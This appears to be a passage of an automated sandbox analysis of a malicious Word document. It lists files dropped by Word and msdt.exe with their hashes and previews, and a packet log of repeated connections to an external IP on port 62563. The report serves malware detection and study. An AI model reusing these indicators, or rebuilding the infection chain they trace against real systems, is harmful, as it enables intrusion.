                                                                                                                                              SHA1:F09D66A19ADBF85D9CD6FD41D6BD671DC516C598
                                                                                                                                              SHA-256:B2C16B6669CCC85B6C96BD572D8B5EAE14B12C73068480355AC9AE1A0F104A3C
                                                                                                                                              SHA-512:3BBCDEDE28C0920A6B6F29135915DC2CA59AEE23854133D48EE1339E223A47366700E92291F772DCFDC9719AE167C1A430A96F199D489B70907CAF1C934DA5B5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:42 2022, mtime=Thu Jun 16 20:20:13 2022, atime=Thu Jun 16 20:19:54 2022, length=520148, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1060
                                                                                                                                              Entropy (8bit):4.716831781392583
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8JIpHT1jU0uElPCH2HFHIiF+WZmfGGkjEjAJ/YLDmPgNDOTx5j4t2Y+xIBjKZm:8JYrFV2iUAJ8AADO9z7aB6m
                                                                                                                                              MD5:33785A075627AA0126024E30D72DD180
                                                                                                                                              SHA1:C31CA5037CF1385DE28103FA44B2D841368B39A3
                                                                                                                                              SHA-256:01A51BF0C3F705D1ACC0F47E85E825754CF92C153AAFC70105F677A4DCD3AFF7
                                                                                                                                              SHA-512:55A7F28136BC4BCAE37578D6217E96E3359E29912EA9B2D7CB7F85D2BB9A897FD1F4C806366BA3306F19F773195B30DF9B53F752D44ACD834A3A4C21B897C21A
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:L..................F.... ...feZ..3....'....B...................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Tt.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..Tt......S....................,...h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..Tt......Y..............>......~.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2......T|. .V3G2PF~1.DOC..P......hT...T|.....h.........................V.3.g.2.P.f.u.7.0.7...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\V3g2Pfu707.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.V.3.g.2.P.f.u.7.0.7...d.o.c.x.........:..,.LB.)...As...`.......X.......878411...........!a..%.H.VZAj................-..!a..%.H.VZAj................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):82
                                                                                                                                              Entropy (8bit):4.8455100909670845
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:bDuMJlrjmZFSmxW4FXJmZFSv:bCgjCFzZCFc
                                                                                                                                              MD5:B2346410BF881C384BCAB69773547CF5
                                                                                                                                              SHA1:AECF4DEB8E6951D92D2C1AA4EC1903419619AA61
                                                                                                                                              SHA-256:A48C6AC2064B5E9EF0864D88D919F0D0462A5E45196452A728E59C7AC1577392
                                                                                                                                              SHA-512:B8A69E92B26ECAE535964895E58628AA0BBBEA8F3457C110046AC9F9D3E2C6D6818CB49426877AB6B9A6AABD9FFD9A8AD0E7A1E1FE9106604AA32981E1107744
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[folders]..Templates.LNK=0..V3g2Pfu707.docx.LNK=0..[misc]..V3g2Pfu707.docx.LNK=0..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):3.0687961738583445
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/ZdusscN2ltmklFldkltzl/ln:RtZWQs6X
                                                                                                                                              MD5:9C34F698E59E336BB61C5119231A8C09
                                                                                                                                              SHA1:ED14C5885E9F418F5D93A15844B3A4AB2AF50155
                                                                                                                                              SHA-256:8063CA4B80C0B4B34FB52C641D817CA596DE6E88F00B990CE3FC09D6C07D598C
                                                                                                                                              SHA-512:6FEC94749DE432D3CA86F16239BBF1E3E8AC279062A4FBE0D4BCF4F3BF80B9703611F17363A8943A8C2AB9F406BBDE774332AAA3B614FFBE4B56869835D2A0F5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h..........J,y.....^El@.DlT.Dl`.DlDBElZREl.J(y........`)$..................J.y.........)$.....
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):162
                                                                                                                                              Entropy (8bit):3.1182093265357653
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Rl/ZdusscN2ltmklilzkltzl/ln:RtZWQsGMX
                                                                                                                                              MD5:6B3FBED7E6A68126551A4EF251E1F4CE
                                                                                                                                              SHA1:EF42D8B8FFD2915B2193D46E1E3D191ADA088913
                                                                                                                                              SHA-256:9FC6E91279CB4D343306D14429690C873593C6A7D65144C7EBFF86AD7FC2FC9E
                                                                                                                                              SHA-512:7840393BF7F8C8AFC2B31E95E3FA43999B01289C0BCEB08FBF6AE748FFD22AD54A98058ADF746879BED6037120331BE6AAD9E1467F883431597D7D6D78007C8B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.pratesh................................................p.r.a.t.e.s.h..........J,y.....^El@.DlT.Dl`.DlDBElZREl.J(y........`)$..................J.y.........)$.....
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):24702
                                                                                                                                              Entropy (8bit):4.37978533849437
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                              MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                              SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                              SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                              SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):66560
                                                                                                                                              Entropy (8bit):6.926109943059805
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                              MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                              SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                              SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                              SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):50242
                                                                                                                                              Entropy (8bit):4.932919499511673
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                              MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                              SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                              SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                              SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16946
                                                                                                                                              Entropy (8bit):4.860026903688885
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                              MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                              SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                              SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                              SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):453
                                                                                                                                              Entropy (8bit):4.983419443697541
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                              MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                              SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                              SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                              SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6650
                                                                                                                                              Entropy (8bit):3.6751460885012333
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                              MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                              SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                              SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                              SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10752
                                                                                                                                              Entropy (8bit):3.517898352371806
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                              MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                              SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                              SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                              SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):48956
                                                                                                                                              Entropy (8bit):5.103589775370961
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                              MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                              SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                              SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                              SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                              File type:Microsoft OOXML
                                                                                                                                              Entropy (8bit):7.997351182794523
                                                                                                                                              TrID:
                                                                                                                                              • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                              • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                              • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                              File name:V3g2Pfu707.docx
                                                                                                                                              File size:520148
                                                                                                                                              MD5:b60cd79e2c14dbeefa22197f76fc3437
                                                                                                                                              SHA1:07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9
                                                                                                                                              SHA256:6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1
                                                                                                                                              SHA512:3c565f6be03534118eaf0b35221a4962d7ff8b64af3408ec72949809e9fe8e935652e38dbdaff8960c5e5b886e81d1c0014cb4981e5fed153833e6877c8a8b21
                                                                                                                                              SSDEEP:12288:ZTAhQSKy2e6tLkAPqq/Q62J0yLz+hyXF+uObrp:1AGSs5Dqq/Qvz+hQU1
                                                                                                                                              TLSH:A6B423F798435185CB2A58BBD80B829BDCF096B724341DD2BCBC24878BC578E4A67527
                                                                                                                                              File Content Preview:PK...........T-../j...........[Content_Types].xml...j.0.E.....6.J.(.....e.h...4v.......c;5%$64..`..{.Xb...V..|...d..I..[!M....k.@....LY.9.A ....x.s..T...e.......Y......z."...:..Y..n8.....&... ..3.l.b.........$OMc....+..@.j<.p.a.).Y.:].q@...2T.=a)].`....r:
                                                                                                                                              Icon Hash:74fcd0d2d6d6d0cc
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Jun 16, 2022 14:20:01.900645018 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.133006096 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.133150101 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.135394096 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.359359980 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.359416008 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.359455109 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.359539032 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.371578932 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.468226910 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.686306000 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.686450005 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.686994076 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.904742002 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.905064106 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.905086994 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:02.905184031 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:02.905255079 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:03.126285076 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:05.961309910 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.190330029 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.190459013 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.190567017 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.418637991 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.419333935 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.419361115 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.419506073 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.420177937 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.522555113 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.750639915 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.750817060 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.751089096 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.981957912 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982336998 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982383966 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982436895 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982460022 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.982486963 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982521057 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.982546091 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982549906 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.982584953 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:06.982610941 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.982651949 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:06.984752893 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.168987036 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.209604979 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:07.395502090 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:07.395735025 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.395937920 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.626498938 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:07.629883051 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:07.629930973 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:07.630073071 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.630156040 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.630160093 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:07.852909088 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:07.871310949 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.107610941 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.107745886 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.133632898 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.362663984 CEST6256349751101.33.231.81192.168.2.3
